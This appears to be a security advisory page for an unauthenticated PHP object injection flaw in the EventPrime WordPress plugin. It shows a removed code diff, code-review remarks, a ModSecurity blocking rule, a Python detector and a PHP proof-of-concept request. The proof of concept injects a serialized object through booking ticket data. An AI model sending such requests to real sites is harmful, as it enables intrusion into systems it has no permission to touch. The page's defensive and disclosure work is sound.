-                        foreach ( $single_ticket_type_seats_data as $ticket_area_data ) {
-                            $area_id = $ticket_area_data->area_id;
-                            foreach ( $ticket_area_data->seat_data as $ticket_seat ) {
-
-                                if( ! empty( $ticket_seat->uid ) ) {
-                                    $ticket_seat_uid = $ticket_seat->uid;
-
-                                    // If seat has been sold then throw error. *****
-                                    if(isset($event_seats_current_details) && !empty($event_seats_current_details))
-                                    {
-                                        foreach ( $event_seats_current_details->{$area_id}->seats as $event_seats_data ) {
-                                            foreach ( $event_seats_data as $event_seats_row ) {
-                                                if ( ($event_seats_row->uniqueIndex == $ticket_seat_uid) && ($event_seats_row->type == 'sold') ) {
-                                                    $data = false;
-                                                }
-                                            }
-                                        }
-                                    }
-
-                                }
-                            }
-
-                        }
-                    }
-                }
-
-                if($data===false)
-                {
-                    wp_send_json_error( array( 'error' => esc_html__( 'Something went wrong.', 'eventprime-event-calendar-management' ) ) );
-                    die;
-                }
-                $event_id       = absint( $data['ep_event_booking_event_id'] );
-                $event_name     = get_the_title( $event_id );
-                $user_id        = absint( $data['ep_event_booking_user_id'] );
-                $payment_method = ! empty( $data['payment_processor'] ) ? sanitize_text_field( $data['payment_processor'] ) : 'paypal';
-                if( ! isset( $data['ep_event_booking_total_price'] ) || empty( $data['ep_event_booking_total_price'] ) ) {
-                    $payment_method = 'none';
-                }
-
-                $post_status = 'failed';
-
-                if ( class_exists("Eventprime_Admin_Attendee_Booking") && !empty( get_option( 'ep_set_admin_aab_'.$current_user->ID )) ) {
-                    $post_status = 'completed';
-                    delete_option( 'ep_set_admin_aab_'.$current_user->ID );
-                }
-
-                if( isset( $data['ep_rg_field_email'] ) && ! empty( $data['ep_rg_field_email'] ) ) {
-                    if( isset($data['ep_rg_field_user_name'] ) && ! empty( $data['ep_rg_field_user_name'] ) ) {
-                        $user_controller = new EventM_User_Controller();
-                        $user_data = new stdClass();
-                        $user_data->email = sanitize_text_field($data['ep_rg_field_email']);
-                        $user_data->username = sanitize_text_field($data['ep_rg_field_user_name']);
-                        $user_data->fname = isset($data['ep_rg_field_first_name']) ? sanitize_text_field($data['ep_rg_field_first_name']) : '';
-                        $user_data->lname = isset($data['ep_rg_field_last_name']) ? sanitize_text_field($data['ep_rg_field_last_name']) : '';
-                        $user_data->password = sanitize_text_field($data['ep_rg_field_password']);
-                        unset($data['ep_rg_field_password']);
-                        $user = get_user_by( 'email', $user_data->email );
-                        if(!empty($user)){
-                            $user_id = $user->ID;
-                        }else{
-                            $user_id = $user_controller->ep_checkout_registration($user_data);
-                        }
-                    }
-                }
-                // add new booking
-                $new_post = array(
-                    'post_title'  => $event_name,
-                    'post_status' => $post_status,
-                    'post_type'   => 'em_booking',
-                    'post_author' => $user_id,
-                );
-                $new_post_id = wp_insert_post( $new_post ); // new post id
-
-                update_post_meta( $new_post_id, 'em_id', $new_post_id );
-                update_post_meta( $new_post_id, 'em_event', $event_id );
-                update_post_meta( $new_post_id, 'em_date', current_time( 'timestamp',true ) );
-                update_post_meta( $new_post_id, 'em_user', $user_id );
-                update_post_meta( $new_post_id, 'em_name', $event_name );
-                update_post_meta( $new_post_id, 'em_status', $post_status );
-                update_post_meta( $new_post_id, 'em_payment_method', $payment_method );
-                if(isset($data['ep_gdpr_consent']))
-                {
-                    update_post_meta( $new_post_id, 'ep_gdpr_consent', $data['ep_gdpr_consent'] );
-                    update_post_meta( $new_post_id, 'ep_gdpr_consent_time', current_time('mysql'));
-                }
-                if( isset( $_POST['rid'] ) && ! empty( $_POST['rid'] ) ) {
-                    update_post_meta( $new_post_id, 'em_random_order_id', sanitize_text_field( $_POST['rid'] ) );
-                }
-                // order info
-                $order_info = array();
-                $order_info['tickets']           = json_decode( $data['ep_event_booking_ticket_data'] );
-                $order_info['event_fixed_price'] = ( ! empty( $data['ep_event_booking_event_fixed_price'] ) ? (float)$data['ep_event_booking_event_fixed_price'] : 0.00 );
-                $order_info['booking_total']     = ( ! empty( $data['ep_event_booking_total_price'] ) ? (float)$data['ep_event_booking_total_price'] : 0.00 );
-                $order_info = apply_filters('ep_update_booking_order_info', $order_info, $data);
-                update_post_meta( $new_post_id, 'em_order_info', $order_info );
-                update_post_meta( $new_post_id, 'em_notes', array() );
-                update_post_meta( $new_post_id, 'em_payment_log', array() );
-                update_post_meta( $new_post_id, 'em_booked_seats', array() );
-                update_post_meta( $new_post_id, 'eventprime_updated_pattern',1);
-                $ep_booking_attendee_fields =(isset($data['ep_booking_attendee_fields']))?$sanitizer->sanitize($data['ep_booking_attendee_fields']):array();
-                update_post_meta( $new_post_id, 'em_attendee_names', $ep_booking_attendee_fields );
-                // check for booking fields data
-                $em_booking_fields_data = array();
-                if( ! empty( $data['ep_booking_booking_fields'] ) ) {
-                    $em_booking_fields_data = $data['ep_booking_booking_fields'];
-                }
-                update_post_meta( $new_post_id, 'em_booking_fields_data', $em_booking_fields_data );
-                $order_key = $ep_functions->ep_encrypt_decrypt_pass('encrypt', 'ep_order_'.$new_post_id);
-                update_post_meta( $new_post_id, 'ep_order_key', $order_key );
-
-                do_action( 'ep_after_booking_created', $new_post_id, $data );
-
-                // if booking total is 0 then confirm booking
-                if( $payment_method == 'none' && empty( $order_info['booking_total'] ) ){
-                    $data['payment_gateway'] = 'none';
-                    $data['payment_status']  = 'completed';
-                    $data['total_amount']    = $order_info['booking_total'];
-                    $booking_controller      = new EventPrime_Bookings;
-                    $booking_controller->confirm_booking( $new_post_id, $data );
-                }
-
-                $response                 = new stdClass();
-                $response->order_id       = $new_post_id;
-                $response->payment_method = $payment_method;
-                $response->post_status    = $post_status;
-
-                // Items for paypal order
-                $items = [];
-                $items = $ep_functions->ep_get_paypal_order_items($data);
-                $items = apply_filters('ep_extend_paypal_order_items', $items, $data);
-                $response->items_total = $items['items_total'];
-                $response->items = $items['items'];
-
-                $response->booking_total  = round( (float)$data['ep_event_booking_total_price'], 2 );
-                $response->discount_total = (isset($data['ep_event_booking_total_discount'])) ? round( (float)$data['ep_event_booking_total_discount'], 2 ) : 0;
-                // $response->booking_total  = (float)$data['ep_event_booking_total_price'];
-                // $response->discount_total = (isset($data['ep_event_booking_total_discount']))?(float)$data['ep_event_booking_total_discount']:0;
-
-                $response->item_total     = (float)$data['ep_event_booking_total_tickets'];
-
-                // $redirect                 = esc_url( add_query_arg( array( 'order_id' => $new_post_id ), get_permalink( ep_get_global_settings( 'booking_details_page' ) ) ) );
-                $redirect                 = add_query_arg( array( 'order_id' => $new_post_id ), esc_url( get_permalink( $ep_functions->ep_get_global_settings( 'booking_details_page' ) ) ) );
-                $response->redirect       = apply_filters( 'ep_booking_redirection_url', $redirect, $new_post_id );
-                wp_send_json_success( $response );
-            } else{
-                wp_send_json_error( array( 'error' => esc_html__( 'Security check failed. Please refresh the page and try again later.', 'eventprime-event-calendar-management' ) ) );
-            }
-        } else{
-            wp_send_json_error( array( 'error' => esc_html__( 'Data Not Found', 'eventprime-event-calendar-management' ) ) );
-        }
-    }
-
-    /**
-     * Delete booking timer data from option table
-     */
-    public function booking_timer_complete() {
-        check_ajax_referer( 'flush_event_booking_timer_nonce', 'security' );
-        delete_option( 'ep_event_booking_timer_start' );
-        $booking_data = json_decode( stripslashes( $_POST['booking_data'] ) );
-
-        do_action( 'ep_event_booking_timer_finished', $booking_data );
-        wp_send_json_success(true);
-    }
-
-    /**
-     * Method call from paypal approval
-     */
-    public function paypal_sbpr() {
-        if ( ! check_ajax_referer( 'flush_event_booking_timer_nonce', 'security', false ) ) {
-            wp_send_json_error( array( 'error' => esc_html__( 'Security check failed. Please refresh the page and try again later.', 'eventprime-event-calendar-management' ) ) );
-        }
-
-        if ( empty( $_POST ) ) {
-            wp_send_json_error( array( 'error' => esc_html__( 'Data Not Found', 'eventprime-event-calendar-management' ) ) );
-        }
-
-        $ep_functions  = new Eventprime_Basic_Functions;
-        $data          = $ep_functions->ep_sanitize_input( $_POST['data'] ?? array() );
-        if ( ! is_array( $data ) ) {
-            wp_send_json_error( array( 'error' => esc_html__( 'Invalid payment data.', 'eventprime-event-calendar-management' ) ) );
-        }
-        $booking_id    = absint( $_POST['order_id'] ?? 0 );
-
-        $payment_amount = $data['purchase_units'][0]['amount']['value'] ?? '';
-
-        if ( empty( $booking_id ) || empty( $data ) || $payment_amount === '' ) {
-            wp_send_json_error( array( 'error' => esc_html__( 'Invalid payment data.', 'eventprime-event-calendar-management' ) ) );
-        }
-
-        $order_info = maybe_unserialize( get_post_meta( $booking_id, 'em_order_info', true ) );
-        $booking_status = get_post_meta( $booking_id, 'em_status', true );
-        $booking_user = absint( get_post_meta( $booking_id, 'em_user', true ) );
-
-        if ( ! empty( $booking_user ) && get_current_user_id() !== $booking_user ) {
-            wp_send_json_error( array( 'error' => esc_html__( 'You are not allowed to confirm this booking.', 'eventprime-event-calendar-management' ) ) );
-        }
-
-        if ( empty( $order_info['booking_total'] ) || $order_info['booking_total'] != $payment_amount ) {
-            wp_send_json_error( array( 'error' => esc_html__( 'Payment amount mismatch.', 'eventprime-event-calendar-management' ) ) );
-        }
-
-        if ( ! empty( $booking_status ) && strtolower( $booking_status ) === 'completed' ) {
-            wp_send_json_error( array( 'error' => esc_html__( 'Booking already completed.', 'eventprime-event-calendar-management' ) ) );
-        }
-
-        $payment_status = isset( $data['status'] ) ? strtolower( $data['status'] ) : '';
-        if ( empty( $payment_status ) ) {
-            wp_send_json_error( array( 'error' => esc_html__( 'Missing payment status.', 'eventprime-event-calendar-management' ) ) );
-        }
-        if ( $payment_status !== 'completed' ) {
-            wp_send_json_error( array( 'error' => esc_html__( 'Payment not completed.', 'eventprime-event-calendar-management' ) ) );
-        }
-
-        $data['payment_gateway'] = 'paypal';
-        $data['payment_status']  = $payment_status;
-        $data['total_amount']    = $payment_amount;
-        $data['currency']        = $ep_functions->ep_get_global_settings('currency');
-
-        $booking_controller = new EventPrime_Bookings;
-        $booking_controller->confirm_booking( $booking_id, $data );
-
-        $redirect   = add_query_arg( array( 'order_id' => $booking_id ), esc_url( get_permalink( $ep_functions->ep_get_global_settings( 'booking_details_page' ) ) ) );
-        $return_url = apply_filters( 'ep_booking_redirection_url', $redirect, $booking_id );
-
-        $response = array( 'status' => 'success', 'redirect' => $return_url );
-        wp_send_json_success( $response );
-    }
-
-    /**
-     * Booking cancellation action
-     */
-    public function event_booking_cancel() {
-        if( wp_verify_nonce( $_POST['security'], 'event-booking-cancellation-nonce' ) ) {
-            if( isset( $_POST['booking_id'] ) ) {
-                $booking_id = absint( $_POST['booking_id'] );
-                if( ! empty( $booking_id ) ) {
-                    if (is_user_logged_in()) {
-                        $current_user_id = get_current_user_id();
-                        $booking_controller = new EventPrime_Bookings;
-                        $notification = new EventM_Notification_Service();
-                        $booking = $booking_controller->load_booking_detail( $booking_id );
-                        if( ! empty( $booking ) && $booking->em_user==$current_user_id) {
-                            if ( $booking->em_status == 'cancelled' ) {
-                                wp_send_json_error( array( 'error' => esc_html__( 'The booking is already cancelled', 'eventprime-event-calendar-management' ) ) );
-                            }
-                            if( $booking->em_status == 'refunded' ) {
-                                wp_send_json_error( array( 'error' => esc_html__( 'The booking can not be cancelled. The amount is already refunded', 'eventprime-event-calendar-management' ) ) );
-                            }
-                            if( ! empty( $booking->em_user ) && get_current_user_id() != $booking->em_user ) {
-                                wp_send_json_error( array( 'error' => esc_html__( 'You are not allowed to cancel this booking', 'eventprime-event-calendar-management' ) ) );
-                            }
-
-                            // cancel the booking
-                            update_post_meta( $booking->em_id, 'em_status', 'cancelled' );
-
-                            $booking_controller->update_status( $booking_id, 'cancelled' );
-
-                            // send cancellation mail
-                            $notification->booking_cancel( $booking_id );
-
-                            do_action( 'ep_after_booking_cancelled', $booking );
-
-                            wp_send_json_success( array( 'message' => esc_html__( 'Booking Cancelled Successfully', 'eventprime-event-calendar-management' ) ) );
-                        } else{
-                            wp_send_json_error( array( 'error' => esc_html__( 'Invalid Data', 'eventprime-event-calendar-management' ) ) );
-                        }
-                    } else{
-                        wp_send_json_error( array( 'error' => esc_html__( 'You are not allowed to cancel this booking', 'eventprime-event-calendar-management' ) ) );
-                    }
-                }
-            }
-        } else{
-            wp_send_json_error( array( 'error' => esc_html__( 'Security check failed. Please refresh the page and try again later.', 'eventprime-event-calendar-management' ) ) );
-        }
-    }
-
-    /*
-     * Add booking Notes
-     */
-    public function booking_add_notes(){
-        if (!isset($_POST['security']) || !wp_verify_nonce($_POST['security'], 'ep_booking_nonce')) {
-            wp_die('Security check failed');
-        }
-        if( isset( $_POST['booking_id'] ) && isset($_POST['note']) && !empty(trim($_POST['note'])) && current_user_can('manage_options')) {
-            $booking_id = absint( $_POST['booking_id'] );
-            $note = sanitize_text_field($_POST['note']);
-            $booking_controller = new EventPrime_Bookings();
-            $response = $booking_controller->add_notes( $booking_id, $note);
-            wp_send_json_success( $response );
-        }else{
-            wp_send_json_error();
-        }
-    }
-
-    /**
-     * Event wishlist action
-     */
-    public function event_wishlist_action() {
-        if( isset($_POST['security']) && wp_verify_nonce( $_POST['security'], 'event-wishlist-action-nonce' ) ){
-            if( isset( $_POST['event_id'] ) && ! empty( $_POST['event_id'] ) ) {
-                $event_id = absint( $_POST['event_id'] );
-                $user_id = get_current_user_id();
-                if( empty( $user_id ) ) {
-                    wp_send_json_error( array( 'error' => esc_html__( 'You need to login to add event to wishlist', 'eventprime-event-calendar-management' ) ) );
-                }
-                $ep_functions = new Eventprime_Basic_Functions;
-                $single_event = $ep_functions->get_single_event( $event_id );
-                if( empty( $single_event ) ) {
-                    wp_send_json_error( array( 'error' => esc_html__( 'Event Not Found', 'eventprime-event-calendar-management' ) ) );
-                }
-                // get user wishlist meta
-                $wishlist_meta = get_user_meta( $user_id, 'ep_wishlist_event', true );
-                if( empty( $wishlist_meta ) ) { // if empty the add event id
-                    $wishlist_array = array( $event_id => 1 );
-                    update_user_meta( $user_id, 'ep_wishlist_event', $wishlist_array );
-                    wp_send_json_success( array( 'action' => 'add', 'title'=> $ep_functions->ep_global_settings_button_title( 'Remove From Wishlist' ), 'message' => esc_html__( 'Event added successfully into wishlist', 'eventprime-event-calendar-management' ) ) );
-                } else{
-                    // if already added then remove the event from wishlist
-                    if( array_key_exists( $event_id, $wishlist_meta ) ) {
-                        unset( $wishlist_meta[$event_id] );
-                        update_user_meta( $user_id, 'ep_wishlist_event', $wishlist_meta );
-                        wp_send_json_success( array( 'action' => 'remove', 'title'=> $ep_functions->ep_global_settings_button_title( 'Add To Wishlist' ), 'message' => esc_html__( 'Event removed successfully from wishlist', 'eventprime-event-calendar-management' ) ) );
-                    } else{
-                        $wishlist_meta[$event_id] = 1;
-                        update_user_meta( $user_id, 'ep_wishlist_event', $wishlist_meta );
-                        wp_send_json_success( array( 'action' => 'add', 'title'=> $ep_functions->ep_global_settings_button_title( 'Remove From Wishlist' ), 'message' => esc_html__( 'Event added successfully into wishlist', 'eventprime-event-calendar-management' ) ) );
-                    }
-                }
-            } else{
-                wp_send_json_error( array( 'error' => esc_html__( 'Wrong data.', 'eventprime-event-calendar-management' ) ) );
-            }
-        } else{
-            wp_send_json_error( array( 'error' => esc_html__( 'Security check failed. Please refresh the page and try again later.', 'eventprime-event-calendar-management' ) ) );
-        }
-    }
-
-    /**
-     * Submit the frontend event submission form
-     */
-    public function save_frontend_event_submission() {
-        if( wp_verify_nonce( $_POST['security'], 'ep-frontend-event-submission-nonce' ) ) {
-            global $wpdb;
-            parse_str( wp_unslash( $_POST['data'] ), $data );
-            $ep_functions = new Eventprime_Basic_Functions;
-            $notifications = new EventM_Notification_Service;
-            $sanitizer = new EventPrime_sanitizer;
-            $em_name = htmlspecialchars_decode( sanitize_text_field( $data['em_name'] ) );
-
-            $result = array( 'success' => 1, 'msg' => '' );
-            $checkpoint = apply_filters('ep_handle_frontend_submission_additional_check',$result, $data);
-            if(isset($checkpoint['success']) && empty($checkpoint['success'])){
-                wp_send_json_error( array( 'error' =>  $checkpoint['msg']) );
-                die();
-            }
-            if( empty( $em_name ) ) {
-                wp_send_json_error( array( 'error' => esc_html__( 'Event Name cannot be empty.', 'eventprime-event-calendar-management' ) ) );
-            }
-
-            $guest_submission = $ep_functions->ep_get_global_settings('allow_submission_by_anonymous_user');
-            if( empty( $guest_submission ) && empty( get_current_user_id() ) ) {
-                wp_send_json_error( array( 'error' => esc_html__( 'User login required to submit event.', 'eventprime-event-calendar-management' ) ) );
-            }
-
-            if(empty($guest_submission)){
-                $hasUserRestriction = 0;
-                $frontend_submission_roles = (array) $ep_functions->ep_get_global_settings( 'frontend_submission_roles' );
-                if( ! empty( $frontend_submission_roles ) ) {
-                    $user = wp_get_current_user();
-                    foreach ( $user->roles as $key => $value ) {
-                        if( in_array( $value, $frontend_submission_roles ) ) {
-                            $hasUserRestriction = 1;
-                            break;
-                        }
-                    }
-                }else{
-                    $hasUserRestriction = 1;
-                }
-                if(empty($hasUserRestriction)){
-                       wp_send_json_error( array( 'error' => $ep_functions->ep_get_global_settings('ues_restricted_submission_message') ) );
-                }
-            }
-
-
-
-            $post_status = $ep_functions->ep_get_global_settings( 'ues_default_status' );
-            if( empty( $post_status ) ) {
-                $post_status = 'draft';
-            }
-
-            $event_description = wp_kses_post( stripslashes( $data['em_descriptions'] ) );
-
-            if( isset( $data['event_id'] ) && ! empty( $data['event_id'] ) ) {
-                $post_id = $data['event_id'];
-                if(empty(get_post($post_id)) || get_post_type($post_id) != 'em_event' ){
-                    wp_send_json_error( array( 'error' => esc_html__( 'There is some issue with event. Please try later.', 'eventprime-event-calendar-management' ) ) );
-                }
-                if(!empty($guest_submission) && get_post_meta($post_id, 'em_user_submitted', true) != get_current_user_id()){
-                       wp_send_json_error( array( 'error' => esc_html__( 'Event does not belong to you.', 'eventprime-event-calendar-management' ) ) );
-
-                }
-                $post_update = array(
-                    'ID'         => $post_id,
-                    'post_title' => $em_name,
-                    'post_content' => $event_description,
-                );
-                wp_update_post( $post_update );
-            }else{
-                $post_id = wp_insert_post(array (
-                    'post_type' => 'em_event',
-                    'post_title' => $em_name,
-                    'post_content' => $event_description,
-                    'post_status' => $post_status,
-                    'post_author' => get_current_user_id(),
-                ));
-            }
-
-            update_post_meta( $post_id, 'em_frontend_submission', 1 );
-            update_post_meta( $post_id, 'em_user_submitted', 1 );
-            update_post_meta( $post_id, 'em_user', get_current_user_id() );
-
-            update_post_meta( $post_id, 'em_id', $post_id );
-            update_post_meta( $post_id, 'em_name', $em_name );
-
-            $event_data = new stdClass();
-            $thumbnail_id = isset( $data['attachment_id'] ) ? $data['attachment_id'] : '';
-            set_post_thumbnail( $post_id, $thumbnail_id );
-
-            $em_start_date = isset( $data['em_start_date'] ) ? $ep_functions->ep_date_to_timestamp( sanitize_text_field( $data['em_start_date'] ) ) : '';
-            update_post_meta($post_id, 'em_start_date', $em_start_date);
-
-            $em_start_time = isset( $data['em_start_time'] ) ? sanitize_text_field( $data['em_start_time'] ) : '';
-            update_post_meta($post_id, 'em_start_time', $em_start_time);
-
-            $em_hide_event_start_time = isset( $data['em_hide_event_start_time'] ) && !empty($data['em_hide_event_start_time'] ) ? 1 : 0;
-            update_post_meta( $post_id, 'em_hide_event_start_time', $em_hide_event_start_time );
-
-            $em_hide_event_start_date = isset( $data['em_hide_event_start_date'] ) && !empty( $data['em_hide_event_start_date'] ) ? 1 : 0;
-            update_post_meta( $post_id, 'em_hide_event_start_date', $em_hide_event_start_date );
-
-            $em_end_date = isset( $data['em_end_date'] ) ? $ep_functions->ep_date_to_timestamp( sanitize_text_field( $data['em_end_date'] ) ) : $em_start_date;
-            update_post_meta($post_id, 'em_end_date', $em_end_date);
-
-            $em_end_time = isset( $data['em_end_time'] ) ? sanitize_text_field( $data['em_end_time'] ) : '';
-            update_post_meta($post_id, 'em_end_time', $em_end_time);
-
-            $em_hide_event_end_time = isset( $data['em_hide_event_end_time'] ) && !empty($data['em_hide_event_end_time']) ? 1 : 0;
-            update_post_meta( $post_id, 'em_hide_event_end_time', $em_hide_event_end_time );
-
-            $em_hide_end_date = isset( $data['em_hide_end_date'] ) && !empty( $data['em_hide_end_date'] )? 1 : 0;
-            update_post_meta( $post_id, 'em_hide_end_date', $em_hide_end_date );
-
-            $em_all_day = isset( $data['em_all_day'] ) ? 1 : 0;
-            update_post_meta( $post_id, 'em_all_day', $em_all_day );
-            // if event is all day then end date will be same as start date
-            if( $em_all_day == 1 ) {
-                $em_end_date = $em_start_date;
-                update_post_meta( $post_id, 'em_end_date', $em_end_date );
-                $em_start_time = '12:00 AM'; $em_end_time = '11:59 PM';
-                update_post_meta( $post_id, 'em_start_time', $em_start_time );
-                update_post_meta( $post_id, 'em_end_time', $em_end_time );
-            }
-            // update start and end datetime meta
-            $ep_date_time_format = 'Y-m-d';
-            $start_date = get_post_meta( $post_id, 'em_start_date', true );
-            $start_time = get_post_meta( $post_id, 'em_start_time', true );
-            $merge_start_date_time = $ep_functions->ep_datetime_to_timestamp( $ep_functions->ep_timestamp_to_date( $start_date, 'Y-m-d', 1 ) . ' ' . $start_time, $ep_date_time_format, '', 0, 1 );
-            if( ! empty( $merge_start_date_time ) ) {
-                update_post_meta( $post_id, 'em_start_date_time', $merge_start_date_time );
-            }
-            $end_date = get_post_meta( $post_id, 'em_end_date', true );
-            $end_time = get_post_meta( $post_id, 'em_end_time', true );
-            $merge_end_date_time = $ep_functions->ep_datetime_to_timestamp( $ep_functions->ep_timestamp_to_date( $end_date, 'Y-m-d', 1 ) . ' ' . $end_time, $ep_date_time_format, '', 0, 1 );
-            if( ! empty( $merge_end_date_time ) ) {
-                update_post_meta( $post_id, 'em_end_date_time', $merge_end_date_time );
-            }
-
-            $em_event_date_placeholder = isset( $data['em_event_date_placeholder'] ) ? sanitize_text_field( $data['em_event_date_placeholder'] ) : '';
-            update_post_meta( $post_id, 'em_event_date_placeholder', $em_event_date_placeholder );
-            $em_event_date_placeholder_custom_note = '';
-            if( ! empty( $em_event_date_placeholder ) && $em_event_date_placeholder == 'custom_note' ) {
-                $em_event_date_placeholder_custom_note = sanitize_text_field( $data['em_event_date_placeholder_custom_note'] );
-            }
-            update_post_meta( $post_id, 'em_event_date_placeholder_custom_note', $em_event_date_placeholder_custom_note );
-
-            // add event more dates
-            $em_event_more_dates = isset( $data['em_event_more_dates'] ) ? 1 : 0;
-            update_post_meta( $post_id, 'em_event_more_dates', $em_event_more_dates );
-            $event_more_dates = array();
-            if( isset( $data['em_event_more_dates'] ) && !empty( $data['em_event_more_dates'] ) ) {
-                if( isset( $data['em_event_add_more_dates'] ) && count( $data['em_event_add_more_dates'] ) > 0 ) {
-                    foreach( $data['em_event_add_more_dates'] as $key => $more_dates ) {
-                        $new_date = array();
-                        $new_date['uid']    = absint( $more_dates['uid'] );
-                        $new_date['date']   = $ep_functions->ep_date_to_timestamp( sanitize_text_field( $more_dates['date'] ) );
-                        $new_date['time']   = sanitize_text_field( $more_dates['time'] );
-                        $new_date['label']  = sanitize_text_field( $more_dates['label'] );
-                        $event_more_dates[] = $new_date;
-                    }
-                }
-            }
-		    update_post_meta( $post_id, 'em_event_add_more_dates', $event_more_dates );
-
-            // booking & tickets
-            $em_enable_booking = isset( $data['em_enable_booking
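
Review bot: the removed booking handler decodes `$data['ep_event_booking_ticket_data']` with `json_decode()` twice (once for the seat check, once for `$order_info['tickets']`) and iterates the result without confirming it is an array of objects with the expected `id` and `seats` properties; the replacement should decode once, validate the shape, and reuse that value for both. In the same block `$data['ep_booking_booking_fields']` is written to the `em_booking_fields_data` meta as it arrives in `$data`, while the attendee fields one statement earlier go through `$sanitizer->sanitize()`, so the booking fields deserve the same treatment. In `save_frontend_event_submission()`, the edit path takes `$post_id = $data['event_id']` without `absint()`, and its ownership check compares the `em_user_submitted` meta with `get_current_user_id()` even though that meta is set to `1` further down and the check only runs when guest submission is enabled; comparing against `em_user` and applying the check unconditionally looks like the intent.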

ModSecurity Protection Against This CVE

Here you will find our ModSecurity compatible rule to protect against this particular CVE.

ModSecurity
# Atomic Edge WAF Rule - CVE-2026-24378
# Blocks unauthenticated PHP object injection via EventPrime AJAX handler
# REQUEST_FILENAME excludes the query string, and ARGS covers an action sent in
# either the query string or the body. t:lowercase is not applied because the
# pattern matches the upper-case O: and C: type markers.
SecRule REQUEST_FILENAME "@endsWith /wp-admin/admin-ajax.php" \
  "id:100024378,phase:2,deny,status:403,chain,msg:'CVE-2026-24378: EventPrime PHP Object Injection Attempt',severity:'CRITICAL',tag:'CVE-2026-24378',tag:'WordPress',tag:'EventPrime',tag:'PHP-Object-Injection'"
  SecRule ARGS:action "@streq save_event_booking" "chain"
    SecRule ARGS_POST:ep_event_booking_ticket_data "@rx (?:O:\d+:\"[^\"]+\":|C:\d+:\"[^\"]+\":|a:\d+:\{[^}]*s:\d+:\"[^\"]+\";(?:O|C):)" \
      "t:none,t:urlDecodeUni,t:htmlEntityDecode,setvar:'tx.cve_2026_24378_score=+1',setvar:'tx.anomaly_score=+%{tx.critical_anomaly_score}'"

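The ticket data reaches the handler as JSON inside a form field, so a check for serialized-object tokens is most reliable on the decoded string values rather than on the raw parameter. The sketch below is an added example, not Atomic Edge's or EventPrime's code: the function names and the sample bodies are constructed for illustration, and the pattern is a simplified form of the `O:`/`C:` alternatives in the rule above.

```python
import json
import re
from urllib.parse import parse_qs, urlencode

# PHP serialize() object tokens, O:<len>:"Class": or C:<len>:"Class":
SERIALIZED_OBJECT = re.compile(r'[OC]:\d+:"[^"]+":')


def string_leaves(node):
    """Yield every string key and value in a decoded JSON document."""
    if isinstance(node, str):
        yield node
    elif isinstance(node, dict):
        for key, value in node.items():
            yield key
            yield from string_leaves(value)
    elif isinstance(node, list):
        for item in node:
            yield from string_leaves(item)


def inspect_booking_request(body):
    """Classify a form-encoded admin-ajax.php body as ignore, allow or block."""
    form = parse_qs(body, keep_blank_values=True)
    if form.get("action", [""])[-1] != "save_event_booking":
        return "ignore"
    for raw in form.get("ep_event_booking_ticket_data", []):
        try:
            # Decode first: in the raw JSON text the quotes inside a string
            # value are escaped as \" and the pattern would not line up.
            decoded = json.loads(raw)
        except ValueError:
            decoded = raw  # not JSON, inspect the value as sent
        if any(SERIALIZED_OBJECT.search(s) for s in string_leaves(decoded)):
            return "block"
    return "allow"


def sample_body(uid):
    """Constructed sample request body (not captured traffic)."""
    tickets = [{"id": 1, "seats": [{"area_id": "1", "seat_data": [{"uid": uid}]}]}]
    return urlencode({"action": "save_event_booking",
                      "ep_event_booking_event_id": "1",
                      "ep_event_booking_ticket_data": json.dumps(tickets)})


if __name__ == "__main__":
    marker = 'O:8:"stdClass":1:{s:4:"test";s:10:"injection"}'  # test string from the page's PoC
    for label, uid in (("seat id", "A-12"), ("serialized object", marker)):
        print(label, "->", inspect_booking_request(sample_body(uid)))
```

The same walk over decoded values can be run against stored access or audit logs to find earlier requests that carried serialized objects in this parameter.
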
Proof of Concept (PHP)

NOTICE :

This proof-of-concept is provided for educational and authorized security research purposes only.

You may not use this code against any system, application, or network without explicit prior authorization from the system owner.

Unauthorized access, testing, or interference with systems may violate applicable laws and regulations in your jurisdiction.

This code is intended solely to illustrate the nature of a publicly disclosed vulnerability in a controlled environment and may be incomplete, unsafe, or unsuitable for real-world use.

By accessing or using this information, you acknowledge that you are solely responsible for your actions and compliance with applicable laws.

 
PHP PoC
<?php
// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept
// CVE-2026-24378 - EventPrime – Events Calendar, Bookings and Tickets <= 4.2.8.0 - Unauthenticated PHP Object Injection

/**
 * DISCLAIMER: For authorized security testing only.
 * This PoC demonstrates the attack vector, not a full exploit chain.
 */

$target_url = 'http://target-site.com/wp-admin/admin-ajax.php';

// Craft malicious serialized object (example using common WordPress gadget)
// Note: Actual POP chain depends on installed plugins/themes
$malicious_object = 'O:8:"stdClass":1:{s:4:"test";s:10:"injection"}';

// Build ticket data structure containing serialized object
$ticket_data = array(
    array(
        'id' => 1,
        'seats' => array(
            array(
                'area_id' => '1',
                'seat_data' => array(
                    array(
                        'uid' => $malicious_object  // Injected serialized object
                    )
                )
            )
        )
    )
);

$post_data = array(
    'action' => 'save_event_booking',
    'ep_save_event_booking_nonce' => 'dummy_nonce',  // Nonce bypass in vulnerable versions
    'ep_event_booking_event_id' => '1',
    'ep_event_booking_ticket_data' => json_encode($ticket_data),
    'ep_event_booking_event_fixed_price' => '0'
);

$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $target_url);
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($post_data));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_HTTPHEADER, array('Content-Type: application/x-www-form-urlencoded'));

$response = curl_exec($ch);
$http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);
curl_close($ch);

echo "HTTP Response Code: $http_code\n";
echo "Response: $response\n";

// Check for deserialization indicators
if (strpos($response, 'unserialize') !== false || strpos($response, 'object') !== false) {
    echo "[+] Potential vulnerability detected\n";
} else {
    echo "[-] No obvious indicators found\n";
}
?>
